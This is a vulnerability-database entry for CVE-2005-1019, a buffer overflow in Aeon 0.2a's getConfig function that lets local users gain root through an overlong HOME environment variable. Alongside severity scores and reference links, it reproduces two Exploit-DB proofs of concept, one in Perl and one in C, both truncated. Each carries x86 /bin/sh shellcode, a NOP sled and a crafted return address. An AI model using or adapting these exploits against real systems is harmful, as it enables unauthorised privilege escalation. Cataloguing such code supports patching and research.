CVE-2005-1019
published 2005-05-02CVE-2005-1019: Buffer overflow in the getConfig function in Aeon 0.2a and earlier allows local users to gain privileges via a long HOME environment variable.
PriorityP427high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.11%
61.7th percentile
Buffer overflow in the getConfig function in Aeon 0.2a and earlier allows local users to gain privileges via a long HOME environment variable.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aeon | aeon | — | — |
| aeon | aeon | — | — |
| aeon | aeon | — | — |
| aeon | aeon | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Aeon 0.2a - Local Linux (1)
exploitdb·2005-04-05
CVE-2005-1019 Aeon 0.2a - Local Linux (1)
Aeon 0.2a - Local Linux (1)
---
#!/usr/bin/perl
# Aeon-mail relay agent for Linux *
# *
# written by lammat just for practice purposes *
# tested against aeon-0.2a *
# http://grpower.ath.cx *
# [email protected] *
# execve(/bin/sh) for linux x86
# 29 bytes
# by Matias Sedalo
$shellcode =
"\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68".
"\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
$buf = 528;
$ret = 0xbfffe122;
$nop = "\x90";
if (@ARGV == 1) {
$offset = $ARGV[0];
}
for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
$new_ret = pack('l', ($ret + $offset));
until (length($buffer) == $buf) {
$buffer .= $new_ret;
}
local($ENV{'HOME'}) = $
Exploit-DB
Aeon 0.2a - Local Linux (2)
exploitdb·2005-04-05
CVE-2005-1019 Aeon 0.2a - Local Linux (2)
Aeon 0.2a - Local Linux (2)
---
/* first release /str0ke */
/*
local linux exploit within aeon-0.2a
Coded by patr0n (security-tmp.h14.ru)
*/
#define BUFLEN 533
#define PATH "/home/research/aeon-0.2a/aeon"
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
int main(int argc, char *argv[]) {
char evilbuf[BUFLEN];
int i;
char *p,*av[2], *ev[3];
char *egg;
egg=(char *)malloc(1000);
sprintf(egg, "EGG=");
memset(egg + 4, 0x90, 1000-1-strlen(shellcode));
sprintf(egg + 4 + 1000-1-strlen(shellcode), "%s", shellcode);
long ret=0xbfffffff-5-strlen(egg)-strlen(PATH);
p=evilbuf;
bzero(evilbuf,sizeof(evilbuf));
strcpy(evilbuf,"HOME=");
for(i=
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111262942708249&w=2http://security-tmp.h14.ru/exploits/23laeon.c.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/19951http://marc.info/?l=bugtraq&m=111262942708249&w=2http://security-tmp.h14.ru/exploits/23laeon.c.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/19951
2005-05-02
Published